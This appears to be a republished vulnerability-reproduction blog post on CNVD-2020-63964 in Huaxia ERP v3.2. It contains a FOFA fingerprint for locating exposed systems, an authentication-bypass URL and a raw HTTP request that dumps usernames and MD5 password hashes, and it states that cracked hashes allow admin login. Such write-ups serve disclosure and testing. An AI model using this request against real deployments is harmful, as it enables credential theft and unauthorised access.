Huaxia ERP has leaked user name and password sensitive vulnerabilities (CNVD-2020-63964)

Enterprise 2023-08-26 00:27:31 views: null

Article directory

Huaxia ERP has leaked user name and password sensitive vulnerabilities (CNVD-2020-63964)

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Introduction to Huaxia ERP

WeChat official account search: Nanfeng Vulnerability Reappearance Library
This article was first published on the Nanfeng Vulnerability Reproduction Library official account

Based on the SpringBoot framework and SaaS model, Huaxia ERP is determined to provide open source and easy-to-use ERP software for small and medium-sized enterprises. Currently, it focuses on invoicing + financial functions.

2. Vulnerability description

Based on the SpringBoot framework and SaaS model, Huaxia ERP is determined to provide open source and easy-to-use ERP software for small and medium-sized enterprises. Currently, it focuses on invoicing + financial functions. There is a sensitive information vulnerability in the Huaxia ERP system, which can be exploited by attackers to obtain sensitive information.

CVE number:
CNNVD number:
CNVD number: CNVD-2020-63964

3. Affect the version

Huaxia ERP v3.2

4. fofa query statement

“jshERP-boot”
Huaxia ERP has leaked user name and password sensitive vulnerabilities (CNVD-2020-63964)

5. Vulnerability recurrence

Vulnerability link: http://127.0.0.1/jshERP-boot/user/getAllList;.ico
vulnerability data package:

GET /jshERP-boot/user/getAllList HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

Huaxia ERP has leaked user name and password sensitive vulnerabilities (CNVD-2020-63964)
The password is encrypted by md5, and you can log in to the background after decrypting it
Huaxia ERP has leaked user name and password sensitive vulnerabilities (CNVD-2020-63964)

6.POC&EXP

Follow the public account Nanfeng Vulnerability Reproduction Library and reply Vulnerability Reproduction 36 to get the download address of the POC tool:

Huaxia ERP has leaked user name and password sensitive vulnerabilities (CNVD-2020-63964)

7. Rectification opinions

The manufacturer has not yet provided a repair solution, please pay attention to the update of the manufacturer's homepage: https://gitee.com/jishenghua/JSH_ERP

8. Past review

Guess you like

Origin blog.csdn.net/nnn2188185/article/details/131255194
Recommended
Ranking
Linux关机和重启详解(shutdown、halt、poweroff、reboot、init)
Netty work notes 0007---NIO's three core component relationships
Knife4j tutorial
2021.10.29,内容:什么时候用接口和抽象类
How to solve the problem that changing the memory frequency causes the computer to become unusable?
SpringMVC Tutorial - Controller
linux learning skills -Linux 25 transport Vega paid special privileges and facl extension
Financial quarterly report evaluation report data automatic generation 1.0
Agile Development Series - The Values of Agile Development
scrapy achieve browsercookie Middleware
Daily
More
2024-05-19(0)
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)

Code World

© 2018 codetd.com